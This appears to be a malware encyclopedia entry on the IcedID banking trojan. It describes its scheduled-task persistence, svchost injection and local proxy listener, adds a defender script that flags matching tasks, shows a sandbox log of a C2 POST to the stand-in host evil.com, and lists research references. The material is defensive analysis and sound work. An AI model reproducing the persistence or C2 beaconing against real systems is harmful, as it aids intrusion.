win.icedid

IcedID

aka: BokBot, IceID

Actor(s): GOLD CABIN, Lunar Spider


Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
  * Name: Update
  * Trigger: At log on
  * Action: `%LocalAppData%\$Example\waroupada.exe /i`
  * Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppData% appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware executable (e.g. waroupada.exe) spawns an instance of svchost.exe as a sub-process and then injects and executes its malicious code within it.
* If “/i” is not passed as an argument, it sets up persistence and waits for a reboot.
* If “/i” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes, resulting in C2 communication.
* It employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so: `rundll32.exe kernel32,Sleep -s`
* It sets up a local listener to proxy traffic on 127.0.0.1:50000.
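
A defender-side check for the persistence traits listed above, as an added example that is not part of the original page: it reads Task Scheduler XML exports and flags tasks that combine a logon trigger with an `.exe` one level below %LocalAppData% that is run with `/i`. The two task definitions, the user name `analyst`, the directory names and the function names are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Namespace of Task Scheduler XML (schtasks /query /xml, or the files under
# %SystemRoot%\System32\Tasks; those are UTF-16 on disk, decode before use).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# <LocalAppData>\<one sub-directory>\<file>.exe, with the variable either
# unexpanded or already expanded to a user profile path.
LOCALAPPDATA_EXE = re.compile(
    r"^(?:%localappdata%|[a-z]:\\users\\[^\\]+\\appdata\\local)"
    r"\\(?P<subdir>[^\\]+)\\(?P<exe>[^\\]+\.exe)$",
    re.IGNORECASE,
)


def check_task(xml_text, program_files_dirs=()):
    """Compare one exported task with the persistence traits on this page.

    'match' is True when the three core traits are all present: a logon
    trigger, an .exe one level below LocalAppData, and the argument /i.
    'extra' lists weaker supporting traits that were also seen.
    """
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", "", NS)
    name = uri.rsplit("\\", 1)[-1]
    has_logon = root.find("t:Triggers/t:LogonTrigger", NS) is not None
    idle_text = root.findtext("t:Settings/t:IdleSettings/t:StopOnIdleEnd", "", NS)
    stop_on_idle_end = idle_text.strip().lower() == "true"

    hits = []
    for action in root.findall("t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", "", NS).strip().strip('"')
        args = action.findtext("t:Arguments", "", NS).strip()
        m = LOCALAPPDATA_EXE.match(command)
        if m and args.lower() == "/i":
            hits.append((command, m.group("subdir")))

    extra = []
    if name.lower() == "update":
        extra.append("task name is 'Update'")
    if stop_on_idle_end:
        extra.append("StopOnIdleEnd is true")
    known = {d.lower() for d in program_files_dirs}
    if any(subdir.lower() in known for _, subdir in hits):
        # The page's unverified observation: the folder name is borrowed
        # from a directory that exists under %ProgramFiles%.
        extra.append("sub-directory name also exists under Program Files")

    return {
        "name": name,
        "match": bool(has_logon and hits),
        "command": hits[0][0] if hits else None,
        "extra": extra,
    }


def scan(tasks, program_files_dirs=()):
    """Return the names of all tasks whose core traits match."""
    results = (check_task(x, program_files_dirs) for x in tasks)
    return [r["name"] for r in results if r["match"]]


# Constructed sample: mirrors the task described in the observations.
SUSPICIOUS_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Update</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd></IdleSettings></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\analyst\AppData\Local\Common Files\waroupada.exe</Command>
      <Arguments>/i</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed sample: a per-user updater that also starts at logon from
# LocalAppData but uses different arguments, so it must not be flagged.
BENIGN_TASK = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleUpdater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><IdleSettings><StopOnIdleEnd>true</StopOnIdleEnd></IdleSettings></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\analyst\AppData\Local\ExampleApp\Update.exe</Command>
      <Arguments>--processStart ExampleApp.exe</Arguments>
    </Exec>
  </Actions>
</Task>
"""

if __name__ == "__main__":
    pf_dirs = ["Common Files", "Internet Explorer"]  # constructed listing
    for xml_text in (SUSPICIOUS_TASK, BENIGN_TASK):
        print(check_task(xml_text, pf_dirs))
```

The task name and the idle condition are reported only as supporting traits because both are common on clean systems; the match itself rests on the trigger, path and argument together.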

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
2022-05-12Intel 471Intel 471
@online{471:20220512:what:05369d4, author = {Intel 471}, title = {{What malware to look for if you want to prevent a ransomware attack}}, date = {2022-05-12}, organization = {Intel 471}, url = {https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike}, language = {English}, urldate = {2022-05-13} } What malware to look for if you want to prevent a ransomware attack
Conti BumbleBee Cobalt Strike IcedID Sliver
2022-05-11InfoSec Handlers Diary BlogBrad Duncan
@online{duncan:20220511:ta578:0a0a686, author = {Brad Duncan}, title = {{TA578 using thread-hijacked emails to push ISO files for Bumblebee malware}}, date = {2022-05-11}, organization = {InfoSec Handlers Diary Blog}, url = {https://isc.sans.edu/diary/28636}, language = {English}, urldate = {2022-05-11} } TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
BumbleBee Cobalt Strike IcedID PhotoLoader
2022-05-09CybereasonLior Rochberger
@online{rochberger:20220509:cybereason:9178f63, author = {Lior Rochberger}, title = {{Cybereason vs. Quantum Locker Ransomware}}, date = {2022-05-09}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware}, language = {English}, urldate = {2022-05-11} } Cybereason vs. Quantum Locker Ransomware
IcedID Mount Locker
2022-05-09MicrosoftMicrosoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC)
@online{team:20220509:ransomwareasaservice:13ec472, author = {Microsoft 365 Defender Threat Intelligence Team and Microsoft Threat Intelligence Center (MSTIC)}, title = {{Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself}}, date = {2022-05-09}, organization = {Microsoft}, url = {https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself}, language = {English}, urldate = {2022-05-17} } Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
AnchorDNS BlackCat BlackMatter Conti DarkSide HelloKitty Hive LockBit REvil FAKEUPDATES Griffon ATOMSILO BazarBackdoor BlackCat BlackMatter Blister Cobalt Strike Conti DarkSide Emotet FiveHands Gozi HelloKitty Hive IcedID ISFB JSSLoader LockBit LockFile Maze NightSky Pandora Phobos Phoenix Locker PhotoLoader QakBot REvil Rook Ryuk SystemBC TrickBot WastedLocker
2022-05-04Twitter (@felixw3000)Felix
@online{felix:20220504:twitter:0fb7e35, author = {Felix}, title = {{Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.}}, date = {2022-05-04}, organization = {Twitter (@felixw3000)}, url = {https://twitter.com/felixw3000/status/1521816045769662468}, language = {English}, urldate = {2022-05-09} } Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.
Cobalt Strike IcedID PhotoLoader
2022-04-28SymantecKarthikeyan C Kasiviswanathan, Vishal Kamble
@online{kasiviswanathan:20220428:ransomware:95feafb, author = {Karthikeyan C Kasiviswanathan and Vishal Kamble}, title = {{Ransomware: How Attackers are Breaching Corporate Networks}}, date = {2022-04-28}, organization = {Symantec}, url = {https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker}, language = {English}, urldate = {2022-05-04} } Ransomware: How Attackers are Breaching Corporate Networks
AvosLocker Conti Emotet Hive IcedID PhotoLoader QakBot TrickBot
2022-04-26Intel 471Intel 471
@online{471:20220426:conti:6bcff7d, author = {Intel 471}, title = {{Conti and Emotet: A constantly destructive duo}}, date = {2022-04-26}, organization = {Intel 471}, url = {https://intel471.com/blog/conti-emotet-ransomware-conti-leaks}, language = {English}, urldate = {2022-04-29} } Conti and Emotet: A constantly destructive duo
Cobalt Strike Conti Emotet IcedID QakBot TrickBot
2022-04-25The DFIR ReportThe DFIR Report
@online{report:20220425:quantum:128d2b3, author = {The DFIR Report}, title = {{Quantum Ransomware}}, date = {2022-04-25}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2022/04/25/quantum-ransomware/}, language = {English}, urldate = {2022-04-25} } Quantum Ransomware
Cobalt Strike IcedID
2022-04-17BushidoToken BlogBushidoToken
@online{bushidotoken:20220417:lessons:d4d0595, author = {BushidoToken}, title = {{Lessons from the Conti Leaks}}, date = {2022-04-17}, organization = {BushidoToken Blog}, url = {https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html}, language = {English}, urldate = {2022-04-25} } Lessons from the Conti Leaks
BazarBackdoor Conti Emotet IcedID Ryuk TrickBot
2022-04-14Cert-UACert-UA
@online{certua:20220414:cyberattack:915dfa7, author = {Cert-UA}, title = {{Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)}}, date = {2022-04-14}, organization = {Cert-UA}, url = {https://cert.gov.ua/article/39609}, language = {Ukrainian}, urldate = {2022-04-20} } Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)
IcedID
2022-04-14Bleeping ComputerBill Toulas
@online{toulas:20220414:hackers:2b1153c, author = {Bill Toulas}, title = {{Hackers target Ukrainian govt with IcedID malware, Zimbra exploits}}, date = {2022-04-14}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/}, language = {English}, urldate = {2022-04-15} } Hackers target Ukrainian govt with IcedID malware, Zimbra exploits
IcedID
2022-04-04The DFIR Report@0xtornado, @yatinwad, @MettalicHack, @_pete_0
@online{0xtornado:20220404:stolen:3df91a7, author = {@0xtornado and @yatinwad and @MettalicHack and @_pete_0}, title = {{Stolen Images Campaign Ends in Conti Ransomware}}, date = {2022-04-04}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/}, language = {English}, urldate = {2022-04-04} } Stolen Images Campaign Ends in Conti Ransomware
Conti IcedID
2022-03-31TrellixJohn Fokker, Jambul Tologonov
@online{fokker:20220331:conti:3bc2974, author = {John Fokker and Jambul Tologonov}, title = {{Conti Leaks: Examining the Panama Papers of Ransomware}}, date = {2022-03-31}, organization = {Trellix}, url = {https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html}, language = {English}, urldate = {2022-04-07} } Conti Leaks: Examining the Panama Papers of Ransomware
LockBit Amadey Buer Conti IcedID LockBit Mailto Maze PhotoLoader Ryuk TrickBot
2022-03-29Threat PostElizabeth Montalbano
@online{montalbano:20220329:exchange:ff88f41, author = {Elizabeth Montalbano}, title = {{Exchange Servers Speared in IcedID Phishing Campaign}}, date = {2022-03-29}, organization = {Threat Post}, url = {https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/}, language = {English}, urldate = {2022-03-31} } Exchange Servers Speared in IcedID Phishing Campaign
IcedID
2022-03-28FortinetJames Slaughter, Val Saengphaibul, Fred Gutierrez
@online{slaughter:20220328:spoofed:0cd6f0e, author = {James Slaughter and Val Saengphaibul and Fred Gutierrez}, title = {{Spoofed Invoice Used to Drop IcedID}}, date = {2022-03-28}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id}, language = {English}, urldate = {2022-03-31} } Spoofed Invoice Used to Drop IcedID
IcedID
2022-03-28IntezerJoakim Kennedy, Ryan Robinson
@online{kennedy:20220328:new:cede4da, author = {Joakim Kennedy and Ryan Robinson}, title = {{New Conversation Hijacking Campaign Delivering IcedID}}, date = {2022-03-28}, organization = {Intezer}, url = {https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/}, language = {English}, urldate = {2022-04-05} } New Conversation Hijacking Campaign Delivering IcedID
IcedID PhotoLoader
2022-03-28Bleeping ComputerBill Toulas
@online{toulas:20220328:microsoft:5bc32d1, author = {Bill Toulas}, title = {{Microsoft Exchange targeted for IcedID reply-chain hijacking attacks}}, date = {2022-03-28}, organization = {Bleeping Computer}, url = {https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/}, language = {English}, urldate = {2022-03-30} } Microsoft Exchange targeted for IcedID reply-chain hijacking attacks
IcedID
2022-03-23SecureworksCounter Threat Unit ResearchTeam
@online{researchteam:20220323:threat:84ad46c, author = {Counter Threat Unit ResearchTeam}, title = {{Threat Intelligence Executive Report Volume 2022, Number 2}}, date = {2022-03-23}, organization = {Secureworks}, url = {https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx}, language = {English}, urldate = {2022-03-25} } Threat Intelligence Executive Report Volume 2022, Number 2
Conti Emotet IcedID TrickBot
2022-03-23SecureworksCounter Threat Unit ResearchTeam
@online{researchteam:20220323:gold:0f3da90, author = {Counter Threat Unit ResearchTeam}, title = {{GOLD ULRICK Leaks Reveal Organizational Structure and Relationships}}, date = {2022-03-23}, organization = {Secureworks}, url = {https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships}, language = {English}, urldate = {2022-03-25} } GOLD ULRICK Leaks Reveal Organizational Structure and Relationships
Conti Emotet IcedID TrickBot
2022-03-17Github (eln0ty)Abdallah Elnoty
@online{elnoty:20220317:icedid:0b8ef27, author = {Abdallah Elnoty}, title = {{IcedID Analysis}}, date = {2022-03-17}, organization = {Github (eln0ty)}, url = {https://eln0ty.github.io/malware%20analysis/IcedID/}, language = {English}, urldate = {2022-03-22} } IcedID Analysis
IcedID
2022-03-17Trend MicroTrend Micro Research
@techreport{research:20220317:navigating:5ad631e, author = {Trend Micro Research}, title = {{Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report}}, date = {2022-03-17}, institution = {Trend Micro}, url = {https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf}, language = {English}, urldate = {2022-03-22} } Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report
REvil BazarBackdoor Buer IcedID QakBot REvil
2022-03-09nikpxxors
@online{xors:20220309:bokbot:925e438, author = {xors}, title = {{BokBot Technical Analysis}}, date = {2022-03-09}, organization = {nikpx}, url = {https://nikpx.github.io/malware/analysis/2022/03/09/BokBot}, language = {English}, urldate = {2022-03-10} } BokBot Technical Analysis
IcedID
2022-02-10CybereasonCybereason Global SOC Team
@online{team:20220210:threat:320574f, author = {Cybereason Global SOC Team}, title = {{Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot}}, date = {2022-02-10}, organization = {Cybereason}, url = {https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot}, language = {English}, urldate = {2022-02-10} } Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot
Cobalt Strike Emotet IcedID QakBot
2022-01-18Recorded FutureInsikt Group®
@techreport{group:20220118:2021:9cff6fc, author = {Insikt Group®}, title = {{2021 Adversary Infrastructure Report}}, date = {2022-01-18}, institution = {Recorded Future}, url = {https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf}, language = {English}, urldate = {2022-01-24} } 2021 Adversary Infrastructure Report
BazarBackdoor Cobalt Strike Dridex IcedID QakBot TrickBot
2022-01-01forensicitguyTony Lambert
@online{lambert:20220101:analyzing:1512a76, author = {Tony Lambert}, title = {{Analyzing an IcedID Loader Document}}, date = {2022-01-01}, organization = {forensicitguy}, url = {https://forensicitguy.github.io/analyzing-icedid-document/}, language = {English}, urldate = {2022-01-25} } Analyzing an IcedID Loader Document
IcedID
2021-12-16InfoSec Handlers Diary BlogBrad Duncan
@online{duncan:20211216:how:6fd0b06, author = {Brad Duncan}, title = {{How the "Contact Forms" campaign tricks people}}, date = {2021-12-16}, organization = {InfoSec Handlers Diary Blog}, url = {https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/}, language = {English}, urldate = {2021-12-31} } How the "Contact Forms" campaign tricks people
IcedID
2021-12-03SANS ISC InfoSec ForumsBrad Duncan
@online{duncan:20211203:ta551:f71be57, author = {Brad Duncan}, title = {{TA551 (Shathak) pushes IcedID (Bokbot)}}, date = {2021-12-03}, organization = {SANS ISC InfoSec Forums}, url = {https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/}, language = {English}, urldate = {2021-12-06} } TA551 (Shathak) pushes IcedID (Bokbot)
IcedID
2021-11-16IronNetIronNet Threat Research, Morgan Demboski, Joey Fitzpatrick, Peter Rydzynski
@online{research:20211116:how:d7fdaf8, author = {IronNet Threat Research and Morgan Demboski and Joey Fitzpatrick and Peter Rydzynski}, title = {{How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware}}, date = {2021-11-16}, organization = {IronNet}, url = {https://www.ironnet.com/blog/ransomware-graphic-blog}, language = {English}, urldate = {2021-11-25} } How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware
Cobalt Strike Conti IcedID REvil
2021-11-12Recorded FutureInsikt Group®
@techreport{group:20211112:business:6d6cffa, author = {Insikt Group®}, title = {{The Business of Fraud: Botnet Malware Dissemination}}, date = {2021-11-12}, institution = {Recorded Future}, url = {https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf}, language = {English}, urldate = {2021-11-17} } The Business of Fraud: Botnet Malware Dissemination
Mozi Dridex IcedID QakBot TrickBot
2021-11-04splunkSplunk Threat Research Team
@online{team:20211104:detecting:d8aba5b, author = {Splunk Threat Research Team}, title = {{Detecting IcedID... Could It Be A Trickbot Copycat?}}, date = {2021-11-04}, organization = {splunk}, url = {https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html}, language = {English}, urldate = {2021-11-08} } Detecting IcedID... Could It Be A Trickbot Copycat?
IcedID
2021-11-03Team Cymrutcblogposts
@online{tcblogposts:20211103:webinject:f4d41bb, author = {tcblogposts}, title = {{Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance}}, date = {2021-11-03}, organization = {Team Cymru}, url = {https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/}, language = {English}, urldate = {2021-11-08} } Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance
DoppelDridex IcedID QakBot Zloader
2021-10-18The DFIR ReportThe DFIR Report
@online{report:20211018:icedid:0b574b0, author = {The DFIR Report}, title = {{IcedID to XingLocker Ransomware in 24 hours}}, date = {2021-10-18}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/}, language = {English}, urldate = {2021-10-22} } IcedID to XingLocker Ransomware in 24 hours
Cobalt Strike IcedID Mount Locker
2021-10-15Trend MicroFernando Mercês
@online{mercs:20211015:ransomware:c944933, author = {Fernando Mercês}, title = {{Ransomware Operators Found Using New "Franchise" Business Model}}, date = {2021-10-15}, organization = {Trend Micro}, url = {https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html}, language = {English}, urldate = {2021-10-24} } Ransomware Operators Found Using New "Franchise" Business Model
Glupteba IcedID Mount Locker
2021-09-03Trend MicroMohamad Mokbel
@techreport{mokbel:20210903:state:df86499, author = {Mohamad Mokbel}, title = {{The State of SSL/TLS Certificate Usage in Malware C&C Communications}}, date = {2021-09-03}, institution = {Trend Micro}, url = {https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf}, language = {English}, urldate = {2021-09-19} } The State of SSL/TLS Certificate Usage in Malware C&C Communications
AdWind ostap AsyncRAT BazarBackdoor BitRAT Buer Chthonic CloudEyE Cobalt Strike DCRat Dridex FindPOS GootKit Gozi IcedID ISFB Nanocore RAT Orcus RAT PandaBanker Qadars QakBot Quasar RAT Rockloader ServHelper Shifu SManager TorrentLocker TrickBot Vawtrak Zeus Zloader
2021-08-15SymantecThreat Hunter Team
@techreport{team:20210815:ransomware:f799696, author = {Threat Hunter Team}, title = {{The Ransomware Threat}}, date = {2021-08-15}, institution = {Symantec}, url = {https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf}, language = {English}, urldate = {2021-12-15} } The Ransomware Threat
Babuk BlackMatter DarkSide Avaddon Babuk BADHATCH BazarBackdoor BlackMatter Clop Cobalt Strike Conti DarkSide DoppelPaymer Egregor Emotet FiveHands FriedEx Hades IcedID LockBit Maze MegaCortex MimiKatz QakBot RagnarLocker REvil Ryuk TrickBot WastedLocker
2021-08-05The RecordCatalin Cimpanu
@online{cimpanu:20210805:meet:bce8310, author = {Catalin Cimpanu}, title = {{Meet Prometheus, the secret TDS behind some of today’s malware campaigns}}, date = {2021-08-05}, organization = {The Record}, url = {https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/}, language = {English}, urldate = {2021-08-06} } Meet Prometheus, the secret TDS behind some of today’s malware campaigns
Buer campoloader IcedID QakBot
2021-08-05Group-IBViktor Okorokov, Nikita Rostovcev
@online{okorokov:20210805:prometheus:38ab6a6, author = {Viktor Okorokov and Nikita Rostovcev}, title = {{Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot}}, date = {2021-08-05}, organization = {Group-IB}, url = {https://blog.group-ib.com/prometheus-tds}, language = {English}, urldate = {2021-08-06} } Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot
Prometheus Backdoor Buer campoloader Hancitor IcedID QakBot
2021-07-30HPPatrick Schläpfer
@online{schlpfer:20210730:detecting:2291323, author = {Patrick Schläpfer}, title = {{Detecting TA551 domains}}, date = {2021-07-30}, organization = {HP}, url = {https://threatresearch.ext.hp.com/detecting-ta551-domains/}, language = {English}, urldate = {2021-08-02} } Detecting TA551 domains
Valak Dridex IcedID ISFB QakBot
2021-07-26vmwareQuentin Fois, Pavankumar Chaudhari
@online{fois:20210726:hunting:ff1181b, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{Hunting IcedID and unpacking automation with Qiling}}, date = {2021-07-26}, organization = {vmware}, url = {https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html}, language = {English}, urldate = {2021-07-27} } Hunting IcedID and unpacking automation with Qiling
IcedID
2021-07-23Github (Lastline-Inc)Quentin Fois, Pavankumar Chaudhari
@online{fois:20210723:yara:e9a8a22, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{YARA rules, IOCs and Scripts for extracting IcedID C2s}}, date = {2021-07-23}, organization = {Github (Lastline-Inc)}, url = {https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2}, language = {English}, urldate = {2021-07-27} } YARA rules, IOCs and Scripts for extracting IcedID C2s
IcedID
2021-07-19The DFIR ReportThe DFIR Report
@online{report:20210719:icedid:0365384, author = {The DFIR Report}, title = {{IcedID and Cobalt Strike vs Antivirus}}, date = {2021-07-19}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/}, language = {English}, urldate = {2021-07-20} } IcedID and Cobalt Strike vs Antivirus
Cobalt Strike IcedID
2021-07-14Cerium NetworksBlumira
@online{blumira:20210714:threat:614d084, author = {Blumira}, title = {{Threat of the Month: IcedID Malware}}, date = {2021-07-14}, organization = {Cerium Networks}, url = {https://ceriumnetworks.com/threat-of-the-month-icedid-malware/}, language = {English}, urldate = {2021-07-20} } Threat of the Month: IcedID Malware
IcedID
2021-07-08vmwareQuentin Fois, Pavankumar Chaudhari
@online{fois:20210708:icedid:47da76d, author = {Quentin Fois and Pavankumar Chaudhari}, title = {{IcedID: Analysis and Detection}}, date = {2021-07-08}, organization = {vmware}, url = {https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html}, language = {English}, urldate = {2021-07-20} } IcedID: Analysis and Detection
IcedID
2021-06-30CynetMax Malyutin
@online{malyutin:20210630:shelob:1c93f5d, author = {Max Malyutin}, title = {{Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration}}, date = {2021-06-30}, organization = {Cynet}, url = {https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/}, language = {English}, urldate = {2021-07-20} } Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration
Conti IcedID
2021-06-24SentinelOneMarco Figueroa
@online{figueroa:20210624:evasive:7f0d507, author = {Marco Figueroa}, title = {{Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros}}, date = {2021-06-24}, organization = {SentinelOne}, url = {https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/}, language = {English}, urldate = {2021-06-29} } Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros
IcedID
2021-06-24KasperskyAnton Kuzmenko
@online{kuzmenko:20210624:malicious:83a5c83, author = {Anton Kuzmenko}, title = {{Malicious spam campaigns delivering banking Trojans}}, date = {2021-06-24}, organization = {Kaspersky}, url = {https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917}, language = {English}, urldate = {2021-06-25} } Malicious spam campaigns delivering banking Trojans
IcedID QakBot
2021-06-20The DFIR ReportThe DFIR Report
@online{report:20210620:from:aadb7e8, author = {The DFIR Report}, title = {{From Word to Lateral Movement in 1 Hour}}, date = {2021-06-20}, organization = {The DFIR Report}, url = {https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/}, language = {English}, urldate = {2021-06-22} } From Word to Lateral Movement in 1 Hour
Cobalt Strike IcedID
2021-06-16ProofpointSelena Larson, Daniel Blackford, Garrett M. Graff
@online{larson:20210616:first:2e436a0, author = {Selena Larson and Daniel Blackford and Garrett M. Graff}, title = {{The First Step: Initial Access Leads to Ransomware}}, date = {2021-06-16}, organization = {Proofpoint}, url = {https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware}, language = {English}, urldate = {2021-06-21} } The First Step: Initial Access Leads to Ransomware
BazarBackdoor Egregor IcedID Maze QakBot REvil Ryuk TrickBot WastedLocker
2021-05-29Youtube (AhmedS Kasmani)AhmedS Kasmani
